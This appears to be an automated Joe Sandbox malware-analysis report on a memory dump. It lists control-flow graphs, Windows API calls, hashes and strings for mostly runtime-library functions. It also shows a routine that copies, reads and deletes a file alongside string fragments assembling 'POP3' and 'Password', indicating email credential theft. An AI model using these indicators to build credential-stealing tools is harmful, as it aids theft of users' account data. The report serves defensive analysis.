                                      control_flow_graph 146 20ea173a-20ea17fe call 20eac030 call 20ea2c40 * 2 153 20ea1803 call 20ea1cca 146->153 154 20ea1808-20ea180c 153->154 155 20ea19ad-20ea19b1 154->155 156 20ea1812-20ea1816 154->156 156->155 157 20ea181c-20ea1837 call 20ea1ede 156->157 160 20ea199f-20ea19ac call 20ea1ee7 * 2 157->160 161 20ea183d-20ea1845 157->161 160->155 162 20ea184b-20ea184e 161->162 163 20ea1982-20ea1985 161->163 162->163 168 20ea1854-20ea1881 call 20ea44b0 * 2 call 20ea1db7 162->168 166 20ea1987 163->166 167 20ea1995-20ea1999 163->167 170 20ea198a-20ea198d call 20ea2c40 166->170 167->160 167->161 180 20ea193d-20ea1943 168->180 181 20ea1887-20ea189f call 20ea44b0 call 20ea1db7 168->181 175 20ea1992 170->175 175->167 183 20ea197e-20ea1980 180->183 184 20ea1945-20ea1947 180->184 181->180 197 20ea18a5-20ea18a8 181->197 183->170 184->183 186 20ea1949-20ea194b 184->186 188 20ea194d-20ea194f 186->188 189 20ea1961-20ea197c call 20ea16aa 186->189 190 20ea1951-20ea1953 188->190 191 20ea1955-20ea1957 188->191 189->175 190->189 190->191 194 20ea1959-20ea195b 191->194 195 20ea195d-20ea195f 191->195 194->189 194->195 195->183 195->189 198 20ea18aa-20ea18c2 call 20ea44b0 call 20ea1db7 197->198 199 20ea18c4-20ea18dc call 20ea44b0 call 20ea1db7 197->199 198->199 208 20ea18e2-20ea193b call 20ea16aa call 20ea15da call 20ea2c40 * 2 198->208 199->167 199->208 208->167
                                      APIs
                                        • Part of subcall function 20EA1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D1B
                                        • Part of subcall function 20EA1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20EA1D37
                                        • Part of subcall function 20EA1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D4B
                                      • _strlen.LIBCMT ref: 20EA1855
                                      • _strlen.LIBCMT ref: 20EA1869
                                      • _strlen.LIBCMT ref: 20EA188B
                                      • _strlen.LIBCMT ref: 20EA18AE
                                      • _strlen.LIBCMT ref: 20EA18C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _strlen$File$CopyCreateDelete
                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                      • API String ID: 3296212668-3023110444
                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction ID: 7af69c3bca2cb36f1c2b9d0ec75da45df59c89f4ae598d71a838065b758faea5
                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction Fuzzy Hash: 6561D271D04218ABEF158BE4C851BDEB7F9AF9D304F1040DAE644BE290DB745AC6CB52

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: %m$~$Gon~$~F@7$~dra
                                      • API String ID: 4218353326-230879103
                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction ID: 9ac7c27a236374c84f307292e440af9379e16757be97c800d5724eca39de3303
                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction Fuzzy Hash: AB71E4B1D002286BDF119BE49885BDEBBFC9F5D354F1040DAEA44EB241E6749BC5CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 286 20ea7cc2-20ea7cd6 287 20ea7cd8-20ea7cdd 286->287 288 20ea7d44-20ea7d4c 286->288 287->288 289 20ea7cdf-20ea7ce4 287->289 290 20ea7d4e-20ea7d51 288->290 291 20ea7d93-20ea7dab call 20ea7e35 288->291 289->288 292 20ea7ce6-20ea7ce9 289->292 290->291 294 20ea7d53-20ea7d90 call 20ea571e * 4 290->294 300 20ea7dae-20ea7db5 291->300 292->288 295 20ea7ceb-20ea7cf3 292->295 294->291 298 20ea7d0d-20ea7d15 295->298 299 20ea7cf5-20ea7cf8 295->299 305 20ea7d2f-20ea7d43 call 20ea571e * 2 298->305 306 20ea7d17-20ea7d1a 298->306 299->298 302 20ea7cfa-20ea7d0c call 20ea571e call 20ea90ba 299->302 303 20ea7db7-20ea7dbb 300->303 304 20ea7dd4-20ea7dd8 300->304 302->298 310 20ea7dbd-20ea7dc0 303->310 311 20ea7dd1 303->311 314 20ea7dda-20ea7ddf 304->314 315 20ea7df0-20ea7dfc 304->315 305->288 306->305 312 20ea7d1c-20ea7d2e call 20ea571e call 20ea91b8 306->312 310->311 319 20ea7dc2-20ea7dd0 call 20ea571e * 2 310->319 311->304 312->305 322 20ea7ded 314->322 323 20ea7de1-20ea7de4 314->323 315->300 317 20ea7dfe-20ea7e0b call 20ea571e 315->317 319->311 322->315 323->322 324 20ea7de6-20ea7dec call 20ea571e 323->324 324->322
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 20EA7D06
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA90D7
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA90E9
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA90FB
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA910D
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA911F
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA9131
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA9143
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA9155
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA9167
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA9179
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA918B
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA919D
                                        • Part of subcall function 20EA90BA: _free.LIBCMT ref: 20EA91AF
                                      • _free.LIBCMT ref: 20EA7CFB
                                        • Part of subcall function 20EA571E: HeapFree.KERNEL32(00000000,00000000,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?), ref: 20EA5734
                                        • Part of subcall function 20EA571E: GetLastError.KERNEL32(?,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?,?), ref: 20EA5746
                                      • _free.LIBCMT ref: 20EA7D1D
                                      • _free.LIBCMT ref: 20EA7D32
                                      • _free.LIBCMT ref: 20EA7D3D
                                      • _free.LIBCMT ref: 20EA7D5F
                                      • _free.LIBCMT ref: 20EA7D72
                                      • _free.LIBCMT ref: 20EA7D80
                                      • _free.LIBCMT ref: 20EA7D8B
                                      • _free.LIBCMT ref: 20EA7DC3
                                      • _free.LIBCMT ref: 20EA7DCA
                                      • _free.LIBCMT ref: 20EA7DE7
                                      • _free.LIBCMT ref: 20EA7DFF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: d9df1732fd4849d43384cda24e261012c74fa6e785331f6c4762a728f6d10697
                                      • Instruction ID: d84eb9a98104fa8fc52077bcfcd14d7f3c4379ff1c8fb141ce9b6b3b0dfa3fa5
                                      • Opcode Fuzzy Hash: d9df1732fd4849d43384cda24e261012c74fa6e785331f6c4762a728f6d10697
                                      • Instruction Fuzzy Hash: 55313B32600205DFDB219AB8DD92B667BE9BF09258F50446AF889EF161DE31ADC0CB10

                                      Control-flow Graph

                                      APIs
                                      • _free.LIBCMT ref: 20EA59EA
                                        • Part of subcall function 20EA571E: HeapFree.KERNEL32(00000000,00000000,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?), ref: 20EA5734
                                        • Part of subcall function 20EA571E: GetLastError.KERNEL32(?,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?,?), ref: 20EA5746
                                      • _free.LIBCMT ref: 20EA59F6
                                      • _free.LIBCMT ref: 20EA5A01
                                      • _free.LIBCMT ref: 20EA5A0C
                                      • _free.LIBCMT ref: 20EA5A17
                                      • _free.LIBCMT ref: 20EA5A22
                                      • _free.LIBCMT ref: 20EA5A2D
                                      • _free.LIBCMT ref: 20EA5A38
                                      • _free.LIBCMT ref: 20EA5A43
                                      • _free.LIBCMT ref: 20EA5A51
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d13a21074c82a3c431b410de93f13a903682d36c487bfd5d73facea4e6a70d43
                                      • Instruction ID: 6129db15d797ff94fe5921783520454ca4915dbe7c4bcf1b86889f03c2e469f8
                                      • Opcode Fuzzy Hash: d13a21074c82a3c431b410de93f13a903682d36c487bfd5d73facea4e6a70d43
                                      • Instruction Fuzzy Hash: 6511867A520148FFCB15DF94D842EDD3FA9FF18250B9541A6BE08AF235DA31DE909B80

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 370 20eaaa53-20eaaa6e 371 20eaaa80 370->371 372 20eaaa70-20eaaa7e RtlDecodePointer 370->372 373 20eaaa85-20eaaa8b 371->373 372->373 374 20eaabb2-20eaabb5 373->374 375 20eaaa91 373->375 378 20eaac12 374->378 379 20eaabb7-20eaabba 374->379 376 20eaaba6 375->376 377 20eaaa97-20eaaa9a 375->377 380 20eaaba8-20eaabad 376->380 381 20eaaaa0 377->381 382 20eaab47-20eaab4a 377->382 383 20eaac19 378->383 384 20eaabbc-20eaabbf 379->384 385 20eaac06 379->385 386 20eaac5b-20eaac6a call 20ea2ada 380->386 387 20eaaaa6-20eaaaab 381->387 388 20eaab34-20eaab42 381->388 392 20eaab4c-20eaab4f 382->392 393 20eaab9d-20eaaba4 382->393 389 20eaac20-20eaac49 383->389 390 20eaabfa 384->390 391 20eaabc1-20eaabc4 384->391 385->378 396 20eaaaad-20eaaab0 387->396 397 20eaab25-20eaab2f 387->397 388->389 418 20eaac4b-20eaac50 call 20ea6368 389->418 419 20eaac56-20eaac59 389->419 390->385 398 20eaabee 391->398 399 20eaabc6-20eaabc9 391->399 400 20eaab51-20eaab54 392->400 401 20eaab94-20eaab9b 392->401 395 20eaab61-20eaab8f 393->395 395->419 403 20eaab1c-20eaab23 396->403 404 20eaaab2-20eaaab5 396->404 397->389 398->390 406 20eaabcb-20eaabd0 399->406 407 20eaabe2 399->407 400->386 408 20eaab5a 400->408 401->383 409 20eaaac7-20eaaaf7 403->409 410 20eaab0d-20eaab17 404->410 411 20eaaab7-20eaaaba 404->411 412 20eaabdb-20eaabe0 406->412 413 20eaabd2-20eaabd5 406->413 407->398 408->395 409->419 424 20eaaafd-20eaab08 call 20ea6368 409->424 410->389 411->386 415 20eaaac0 411->415 412->380 413->386 413->412 415->409 418->419 419->386 424->419
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 5140da368f7826920efdeb0b6200abf5c036d8b13dc99f02962d3952a58963eb
                                      • Instruction ID: 42c00f216e2eadcf14468119dec05dffcf2d505edb350946451df5510d2e77f5
                                      • Opcode Fuzzy Hash: 5140da368f7826920efdeb0b6200abf5c036d8b13dc99f02962d3952a58963eb
                                      • Instruction Fuzzy Hash: 8F519E7190470ACBDB019FE8D98459CBFB1FF4D324F684295E581AB214CB798EA4DB24

                                      Control-flow Graph

                                      APIs
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D1B
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20EA1D37
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D4B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D58
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D72
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D7D
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20EA1D8A
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 1454806937-0
                                      • Opcode ID: 8653f9dd4232caa7f01ae66224275dfd0122abf973861642c8fdb65851030c66
                                      • Instruction ID: 9f4c9e739a467a047361ae1548780510d30cc173edb25490ab6ae0c41bbf9709
                                      • Opcode Fuzzy Hash: 8653f9dd4232caa7f01ae66224275dfd0122abf973861642c8fdb65851030c66
                                      • Instruction Fuzzy Hash: 65212FB294521CBFD7109BA08CCCFEF76ADEB5C355F0005A5F612E6140DA749EC59A70

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 444 20ea9492-20ea94ef GetConsoleCP 445 20ea9632-20ea9644 call 20ea2ada 444->445 446 20ea94f5-20ea9511 444->446 447 20ea952c-20ea953d call 20ea7c19 446->447 448 20ea9513-20ea952a 446->448 455 20ea953f-20ea9542 447->455 456 20ea9563-20ea9565 447->456 450 20ea9566-20ea9575 call 20ea79e6 448->450 450->445 460 20ea957b-20ea959b WideCharToMultiByte 450->460 458 20ea9548-20ea955a call 20ea79e6 455->458 459 20ea9609-20ea9628 455->459 456->450 458->445 467 20ea9560-20ea9561 458->467 459->445 460->445 462 20ea95a1-20ea95b7 WriteFile 460->462 464 20ea962a-20ea9630 GetLastError 462->464 465 20ea95b9-20ea95ca 462->465 464->445 465->445 466 20ea95cc-20ea95d0 465->466 468 20ea95fe-20ea9601 466->468 469 20ea95d2-20ea95f0 WriteFile 466->469 467->460 468->446 471 20ea9607 468->471 469->464 470 20ea95f2-20ea95f6 469->470 470->445 472 20ea95f8-20ea95fb 470->472 471->445 472->468
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,20EA9C07,?,00000000,?,00000000,00000000), ref: 20EA94D4
                                      • __fassign.LIBCMT ref: 20EA954F
                                      • __fassign.LIBCMT ref: 20EA956A
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 20EA9590
                                      • WriteFile.KERNEL32(?,?,00000000,20EA9C07,00000000,?,?,?,?,?,?,?,?,?,20EA9C07,?), ref: 20EA95AF
                                      • WriteFile.KERNEL32(?,?,00000001,20EA9C07,00000000,?,?,?,?,?,?,?,?,?,20EA9C07,?), ref: 20EA95E8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 8608c7edd899c7bcdab668a4265830c79a8678773322a6d13a8cf002aedbce8e
                                      • Instruction ID: faf221c256e024448a8c604af30272869874131cf1e5482df0c031c8172de1fd
                                      • Opcode Fuzzy Hash: 8608c7edd899c7bcdab668a4265830c79a8678773322a6d13a8cf002aedbce8e
                                      • Instruction Fuzzy Hash: 1451A371E042099FCB00CFE8C896AEEBBF9FF5D310F14415AE556EB291D630A985CB60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 473 20ea3370-20ea33b5 call 20ea3330 call 20ea37a7 478 20ea3416-20ea3419 473->478 479 20ea33b7-20ea33c9 473->479 481 20ea3439-20ea3442 478->481 482 20ea341b-20ea3428 call 20ea3790 478->482 480 20ea33cb 479->480 479->481 483 20ea33d0-20ea33e7 480->483 487 20ea342d-20ea3436 call 20ea3330 482->487 485 20ea33e9-20ea33f7 call 20ea3740 483->485 486 20ea33fd 483->486 494 20ea33f9 485->494 495 20ea340d-20ea3414 485->495 490 20ea3400-20ea3405 486->490 487->481 490->483 493 20ea3407-20ea3409 490->493 493->481 496 20ea340b 493->496 497 20ea33fb 494->497 498 20ea3443-20ea344c 494->498 495->487 496->487 497->490 499 20ea344e-20ea3455 498->499 500 20ea3486-20ea3496 call 20ea3774 498->500 499->500 501 20ea3457-20ea3466 call 20eabbe0 499->501 505 20ea34aa-20ea34c6 call 20ea3330 call 20ea3758 500->505 506 20ea3498-20ea34a7 call 20ea3790 500->506 510 20ea3468-20ea3480 501->510 511 20ea3483 501->511 506->505 510->511 511->500
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 20EA339B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 20EA33A3
                                      • _ValidateLocalCookies.LIBCMT ref: 20EA3431
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 20EA345C
                                      • _ValidateLocalCookies.LIBCMT ref: 20EA34B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 6613ebd46ccfb6f1be8705722eb488d807520f4e9faef9d542d7a527fed458c2
                                      • Instruction ID: ab89d41581618b1eda00a6e7399b425d5e8b11cc996d29a9612beb4c5869ddef
                                      • Opcode Fuzzy Hash: 6613ebd46ccfb6f1be8705722eb488d807520f4e9faef9d542d7a527fed458c2
                                      • Instruction Fuzzy Hash: 0C41B374A042089BCF01CFF8C8C1A9EBBF5BF4D228F108165F925AF251D7359A95CB90
                                      APIs
                                        • Part of subcall function 20EA9221: _free.LIBCMT ref: 20EA924A
                                      • _free.LIBCMT ref: 20EA92AB
                                        • Part of subcall function 20EA571E: HeapFree.KERNEL32(00000000,00000000,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?), ref: 20EA5734
                                        • Part of subcall function 20EA571E: GetLastError.KERNEL32(?,?,20EA924F,?,00000000,?,00000000,?,20EA9276,?,00000007,?,?,20EA7E5A,?,?), ref: 20EA5746
                                      • _free.LIBCMT ref: 20EA92B6
                                      • _free.LIBCMT ref: 20EA92C1
                                      • _free.LIBCMT ref: 20EA9315
                                      • _free.LIBCMT ref: 20EA9320
                                      • _free.LIBCMT ref: 20EA932B
                                      • _free.LIBCMT ref: 20EA9336
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction ID: 61d8a080528ee3cf767a439cb6239601153891b2b1ab7fad6014afe32256358b
                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction Fuzzy Hash: 8E111272540708FAD520A7F0FC87FCB7BDDAF28700F804835B6997E072DA65B5844661
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,20EA6FFD,00000000,?,?,?,20EA8A72,?,?,00000100), ref: 20EA887B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,20EA8A72,?,?,00000100,5EFC4D8B,?,?), ref: 20EA8901
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 20EA89FB
                                      • __freea.LIBCMT ref: 20EA8A08
                                        • Part of subcall function 20EA56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20EA5702
                                      • __freea.LIBCMT ref: 20EA8A11
                                      • __freea.LIBCMT ref: 20EA8A36
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 4fce290f6faccd16652157ab40f7295ec8e030ec32b8fe2334de45957a1ceced
                                      • Instruction ID: 83573870934cc4efe14830a538831408cdde91d7692383ed5a82225f08f6a8e2
                                      • Opcode Fuzzy Hash: 4fce290f6faccd16652157ab40f7295ec8e030ec32b8fe2334de45957a1ceced
                                      • Instruction Fuzzy Hash: 8A510472610206AFDB198FA0CD81FAB77AAEF48654F510629FD24EE540EB38DCD096D0
                                      APIs
                                      • _strlen.LIBCMT ref: 20EA1607
                                      • _strcat.LIBCMT ref: 20EA161D
                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,20EA190E,?,?,00000000,?,00000000), ref: 20EA1643
                                      • lstrcatW.KERNEL32(?,?), ref: 20EA165A
                                      • lstrlenW.KERNEL32(?,?,?,?,?,20EA190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 20EA1661
                                      • lstrcatW.KERNEL32(00001008,?), ref: 20EA1686
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                      • String ID:
                                      • API String ID: 1922816806-0
                                      • Opcode ID: d99ed1bf2f0fd55d00d612dd6d4a7ff4303bda51647500feb3bcf3635d258e4d
                                      • Instruction ID: 6a0a1b550a5b805fa6cbfc4380bf4380fbcea6f94c9709edc8871f8647fa5af1
                                      • Opcode Fuzzy Hash: d99ed1bf2f0fd55d00d612dd6d4a7ff4303bda51647500feb3bcf3635d258e4d
                                      • Instruction Fuzzy Hash: DD21B636904204ABC7049BA4DC85BEE77F9EF8C720F24405AF905FF141DB34A58587A5
                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 20EA1038
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20EA104B
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20EA1061
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20EA1075
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 20EA1090
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 20EA10B8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrlen$AttributesFilelstrcat
                                      • String ID:
                                      • API String ID: 3594823470-0
                                      • Opcode ID: 9a41198c35106b40c39c569d297ea9ec604ce9defa4d66f74e83ec5f0e9cbe5f
                                      • Instruction ID: 40d24b92182f3c96da511ccb59f373fd75a7f4d6a458d0731d4b654c7e5b6622
                                      • Opcode Fuzzy Hash: 9a41198c35106b40c39c569d297ea9ec604ce9defa4d66f74e83ec5f0e9cbe5f
                                      • Instruction Fuzzy Hash: 7621533690431C9BCF10DBA4DC89EDF376AEF48218F104196E956AB1A1DE349EC5CB50
                                      APIs
                                      • GetLastError.KERNEL32(?,?,20EA3518,20EA23F1,20EA1F17), ref: 20EA3864
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 20EA3872
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 20EA388B
                                      • SetLastError.KERNEL32(00000000,?,20EA3518,20EA23F1,20EA1F17), ref: 20EA38DD
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 1b7732db8463f3c3abc0b3e33ceb3537dbecbf66044d23129268eaf9bd19010c
